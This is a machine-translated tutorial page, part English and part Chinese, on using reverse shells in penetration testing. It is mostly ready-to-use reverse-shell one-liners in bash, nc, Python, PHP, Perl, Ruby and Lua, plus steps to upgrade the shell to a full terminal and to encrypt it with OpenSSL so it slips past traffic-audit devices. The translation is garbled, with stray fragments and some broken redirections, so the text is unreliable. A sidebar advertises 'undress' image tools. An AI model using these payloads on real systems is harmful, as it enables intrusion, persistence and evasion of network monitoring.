System TutorialLINUXIn-depth understanding of shell: Common noun analysis and application scenarios in penetrationIn-depth understanding of shell: Common noun analysis and application scenarios in penetration
What are shells
Shell is a commonly used noun in penetration, such as getshell, webshell, plummet shell, etc., all related to shell.
Shell explained by Baidu Encyclopedia:
In computer science, Shell is also called a shell (to distinguish it from the kernel), which refers to "providing an operating interface for users
face" software (command parser). It is similar to DOS and later
cmd.exe. It receives user commands and then calls the corresponding application.
Simply put, users access the services of the operating system kernel through the shell, that is, from the shell to the kernel to execute system commands.
getshell: Obtain the command execution permission of the target
webshell: refers to the website side doorlinux kernel sprintf, command execution through web service
Big drop shell: transfer the input and output of the command line to other hosts
Why should we drop the shell
1. There is no interaction when executing commands under webshell. In order to facilitate shelling or other operations, you must open the shell.
2. The rebound shell is equivalent to adding a side door. When the webshell is discovered and deleted, the permissions will not be lost.
Commonly used methods to crash the shell in Linux
Use the whereis command to determine the callback techniques supported by the target.
whereis nc bash python php exec lua perl ruby
bash tumble shell
Bash callback is the most commonly used method in actual combat
nc -lvp 9999 bash -i >& /dev/tcp/ip/port 0>&1
Disassemble the command and analyze it:
1. bash-i means opening a bash locally
2. /dev/tcp/ is a special device in Linux. Opening this file is equivalent to issuing a socket call and building a socket connection
3. The file /dev/tcp/ip/port next to >& means redirecting the standard output and standard error output to this file, that is, passing it to the remote vps
4. If the remote vps opens the corresponding port to eavesdrop, it will receive the standard output and standard error output of this bash.
nc tumble shell
Requires nc to be installed on the target host
nc ip port -e /bin/sh
使用其他版本的nc
nc.traditional ip port -e /bin/sh
配合命名管线进行大跌:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
python大跌shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3
0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程
接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。
php大跌shell
须要php关掉safe_mode选项,才可以使用exec函数。
使用php的exec函数执行方式1大跌shell的命令
php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
使用php的fsockopen去大跌shell
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
其它大跌方式
exec大跌
0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
perl大跌
perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby大跌
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
lua大跌
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i &3 2>&3');"
获取一个完全交互shell
通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。
一般存在以下缺点
因而有必要去获取一个完全交互的shell。
1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
隐藏
运行完后
2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:
stty raw -echo fg #将后台运行或挂起的任务切换到前台运行
3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。
reset export SHELL=bash export TERM=xterm-256color stty rows 54 columns 104
SSL流量加密
部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。
因而须要将原始流量使用openssl加密,绕开流量审计设备。
1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2、vps使用OpenSSL窃听一个端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
3、目标主机执行回调加密shell
mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
大跌成功,成功接收到ssl流量加密的shell。
Reference link
The above is the detailed content of In-depth understanding of shell: Common noun analysis and application scenarios in penetration. For more information, please follow other related articles on the PHP Chinese website!
Linux Troubleshooting: 5 Common Problems & How to Fix ThemApr 29, 2025 am 09:42 AMLinux systems are known for their power and reliability, but even experienced users will encounter unexpected problems. Whether it is an unexpectedly deleted file, a forgotten root password, or a slow system running, efficient troubleshooting skills are the key to becoming a Linux expert. This guide will introduce common Linux problem solving scenarios and step-by-step solutions that are common among system administrators, developers, and everyday Linux users. Scene 1: Unexpected deletion of important files You accidentally deleted an important file using the rm command and now you need to restore it. Unlike Windows and macOS, Linux does not have a built-in "recycle bin" to store files deleted from the terminal. Recovery options depend on
How to Permanently Change Docker Folder Permissions on LinuxApr 29, 2025 am 09:35 AMDocker is a powerful tool that allows you to run applications in an isolated environment called containers. However, sometimes you may need to change the permissions of the Docker folder to ensure that your application has access to the necessary files and directories. This article will guide you through the process of permanently changing Docker folder permissions on Linux systems. Understand Docker folder permissions By default, Docker stores its data, including images, containers, and volumes, in specific directories on Linux systems. The most common directory is /var/lib/docker. The permissions of these folders determine who can read, write, or execute the files in it. if
Manage Docker Like a Pro: Install Portainer CE on LinuxApr 29, 2025 am 09:24 AMSimplify Docker Management with Portainer CE on Linux: A Step-by-Step Guide Managing Docker containers via the command line can be daunting, especially for newcomers. Portainer CE (Community Edition) offers a free, lightweight, and intuitive solutio
How to Use Whisper AI for Live Audio Transcription on LinuxApr 29, 2025 am 09:18 AMThis guide details how to install and use Whisper AI for real-time speech-to-text transcription on Linux systems. Whisper AI, an OpenAI creation, offers high-accuracy transcription across multiple languages. While primarily designed for batch proces
Superfile: The Perfect Terminal-Based File Manager for LinuxApr 29, 2025 am 09:16 AMFor Linux terminal enthusiasts, a robust file manager is essential. While many exist, Superfile stands out as a modern, lightweight, and visually appealing choice. This article explores Superfile, its origins, and why it's a top contender for your f
Zellij: The Modern Terminal Multiplexer for Linux UsersApr 29, 2025 am 09:08 AMZellij: A Modern Terminal Multiplexer for Enhanced Linux Workflows Linux terminal multiplexers are indispensable tools for developers and system administrators, streamlining command-line interactions. Zellij, a relatively new open-source multiplexer
How does the boot process differ between Linux and Windows?Apr 29, 2025 am 12:12 AMThe startup process of Linux includes: 1. Start BIOS/UEFI, 2. Load GRUB, 3. Load kernel and initrd, 4. Execute init process, 5. Start system services, 6. Start login manager; the startup process of Windows includes: 1. Start BIOS/UEFI, 2. Load WindowsBootManager, 3. Load winload.exe, 4. Load tonskrnl.exe and HAL, 5. Start system services, 6. Start login screen; Linux provides more customization options, while Windows pays more attention to user experience and stability.
How to Automatically Restart a Failed Service in LinuxApr 28, 2025 am 09:39 AMThis guide details how to configure automatic service restarts in Linux using systemd, enhancing system reliability and minimizing downtime. System administrators often rely on this functionality to ensure critical services, such as web servers (Apa
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
SublimeText3 English version
Recommended: Win version, supports code prompts!
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
SublimeText3 Chinese version
Chinese version, very easy to use
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
